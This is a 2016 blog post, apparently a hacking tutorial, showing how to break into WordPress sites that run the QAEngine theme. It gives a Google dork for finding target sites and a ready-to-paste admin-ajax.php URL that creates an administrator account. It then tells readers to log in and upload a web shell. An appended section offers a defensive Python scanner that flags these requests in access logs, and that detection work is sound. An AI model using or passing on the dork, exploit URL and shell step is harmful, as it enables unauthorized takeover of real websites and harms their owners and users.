Saturday, July 30, 2016

WordPress Qaengine exploit

Hi guys, how are you doing? Here I come with another easy exploit called "Qaengine". Qaengine is an admin-ajax exploit which helps in changing the admin username and password with just a single click of web URL editing.
Let's get started with the exploit.
First of all, go to google.com and paste the following dork: inurl:themes/qaengine. A lot of sites will pop up on Google. Now select any site and add this exploit:
/wp-admin/admin-ajax.php?action=ae-sync-user&method=create&user_login=admin11&user_pass=123456&user_email=mdbext@gmail.com&role=administrator
Example: www.site.com/wp-admin/admin-ajax.php?action=ae-sync-user&method=create&user_login=admin11&user_pass=123456&user_email=mdbext@gmail.com&role=administrator
You can change the email to your email. Now, if the site is vulnerable to our attack, immediately after you paste the exploit something will pop up like (admin-ajax.php). Just download it and check the file. If the admin details changed successfully, you'll see something like {"success":false,"msg" with some text. Now just log in to the admin panel and upload your shell.
In case you don't understand, you can still watch it on YouTube via this link: https://m.youtube.com/watch?v=jtwwMSCg0JA&fulldescription=1&hl=en-GB&client=mv-google&gl=NG
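
For site owners, the request shown above leaves a distinctive trace in the web server access log. The following is an added example, not part of the original post: it scans log lines for admin-ajax.php requests with action=ae-sync-user and method=create. It assumes the Apache/nginx combined log format; the log lines, IP addresses and the function name are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined log format: IP ident user [time] "METHOD URI PROTO" STATUS ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample log lines (documentation IP ranges only).
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Jul/2016:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 58',
    '203.0.113.7 - - [30/Jul/2016:10:02:13 +0000] "GET /wp-admin/admin-ajax.php?action=ae-sync-user&method=create&user_login=admin11&user_pass=x&user_email=a%40example.com&role=administrator HTTP/1.1" 200 412',
    '203.0.113.7 - - [30/Jul/2016:10:02:40 +0000] "GET /wp-login.php HTTP/1.1" 200 2901',
    '198.51.100.4 - - [30/Jul/2016:11:15:09 +0000] "GET /wp-admin/admin-ajax.php?method=create&action=ae%2Dsync%2Duser&user_login=bob&role=subscriber HTTP/1.1" 403 0',
    'malformed line without a request',
]

def find_ae_sync_user_creates(lines):
    """Return one finding per request asking ae-sync-user to create a user."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected log format
        ip, _verb, uri, status = m.groups()
        parts = urlsplit(uri)
        if not parts.path.lower().endswith("/wp-admin/admin-ajax.php"):
            continue
        q = parse_qs(parts.query)  # parse_qs also decodes %-escapes
        first = lambda key: q.get(key, [""])[0]
        if first("action").lower() != "ae-sync-user":
            continue
        if first("method").lower() != "create":
            continue
        role = first("role").lower()
        findings.append({
            "ip": ip,
            "user_login": first("user_login"),
            "role": role,
            "status": int(status),
            # Privileged role requested and the server answered 200: triage first.
            "severity": "high" if role == "administrator" and status == "200" else "review",
        })
    return findings

if __name__ == "__main__":
    for finding in find_ae_sync_user_creates(SAMPLE_LOG):
        print(finding)
```

Access logs record only the query string, so the same parameters sent in a POST body would need request-body logging or a WAF rule to be seen. Any hit is a reason to review the WordPress user list for accounts you did not create.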
